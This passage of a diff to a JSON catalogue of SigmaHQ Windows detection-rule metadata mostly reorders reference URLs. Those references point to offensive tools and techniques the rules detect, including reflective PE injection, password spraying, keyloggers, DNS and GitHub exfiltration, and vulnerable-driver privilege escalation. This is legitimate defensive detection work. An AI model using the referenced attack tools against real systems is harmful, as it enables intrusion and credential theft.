"logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ @@ -25945,8 +25969,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ @@ -25970,8 +25994,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/datasources/DS0005/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ @@ -26004,8 +26028,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ @@ -26061,9 +26085,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://twitter.com/oroneequalsone/status/1568432028361830402", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ @@ -26184,8 +26208,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ @@ -26244,8 +26268,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" ], "tags": [ @@ -26311,8 +26335,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" ], "tags": [ @@ -26453,8 +26477,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -26547,8 +26571,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/995111125447577600", "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" ], "tags": [ @@ -26689,8 +26713,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" ], "tags": [ @@ -26724,9 +26748,9 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -26816,8 +26840,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" ], "tags": [ @@ -27019,8 +27043,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" ], "tags": [ @@ -27119,8 +27143,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" ], @@ -27144,10 +27168,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/ScumBots/status/1610626724257046529", - "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", - "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", + "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", + "https://twitter.com/ScumBots/status/1610626724257046529", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ @@ -27172,8 +27196,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" ], "tags": [ @@ -27263,8 +27287,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" ], "tags": "No established tags" @@ -27326,19 +27350,19 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", "https://github.com/samratashok/nishang", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://adsecurity.org/?p=2921", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ @@ -27442,9 +27466,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://www.shellhacks.com/clear-history-powershell/", + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ @@ -27586,8 +27610,8 @@ "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", - "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], "tags": "No established tags" @@ -27749,8 +27773,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" ], "tags": [ @@ -27877,9 +27901,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" ], "tags": [ @@ -28197,8 +28221,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/995111125447577600", "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" ], "tags": [ @@ -28474,9 +28498,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", - "https://github.com/denandz/KeeFarce", "https://github.com/GhostPack/KeeThief", + "https://github.com/denandz/KeeFarce", + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ @@ -28509,8 +28533,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ @@ -28568,8 +28592,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io", "Personal research, statistical analysis", + "https://lolbas-project.github.io", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" ], "tags": [ @@ -28812,9 +28836,9 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", - "https://github.com/fengjixuchui/gdrv-loader", "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", "https://twitter.com/malmoeb/status/1551449425842786306", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" @@ -28865,18 +28889,18 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", - "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://github.com/Chigusa0w0/AsusDriversPrivEscala", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ @@ -28943,8 +28967,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ @@ -28968,8 +28992,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", "https://reqrypt.org/windivert-doc.html", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml" ], "tags": [ @@ -29011,22 +29035,22 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", "https://github.com/tandasat/ExploitCapcom", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://github.com/namazso/physmem_drivers", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/stong/CVE-2020-15368", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ @@ -29177,8 +29201,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://processhacker.sourceforge.io/", "https://systeminformer.sourceforge.io/", + "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" ], @@ -29213,8 +29237,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml" ], "tags": [ @@ -29238,8 +29262,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/alfarom256/CVE-2022-3699/", + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" ], "tags": [ @@ -29309,8 +29333,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://twitter.com/M_haggis/status/1032799638213066752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" ], "tags": [ @@ -29352,8 +29376,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", "https://pypi.org/project/scapy/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ @@ -29751,8 +29775,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" ], "tags": [ @@ -29856,8 +29880,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ @@ -29891,9 +29915,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/M_haggis/status/900741347035889665", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://twitter.com/M_haggis/status/1032799638213066752", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ @@ -29926,8 +29950,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" ], "tags": [ @@ -30211,8 +30235,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" ], "tags": [ @@ -30279,8 +30303,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" ], "tags": [ @@ -30389,8 +30413,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], "tags": "No established tags" @@ -30411,8 +30435,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://megatools.megous.com/", "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://megatools.megous.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" ], "tags": [ @@ -30554,8 +30578,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ @@ -30581,10 +30605,10 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", 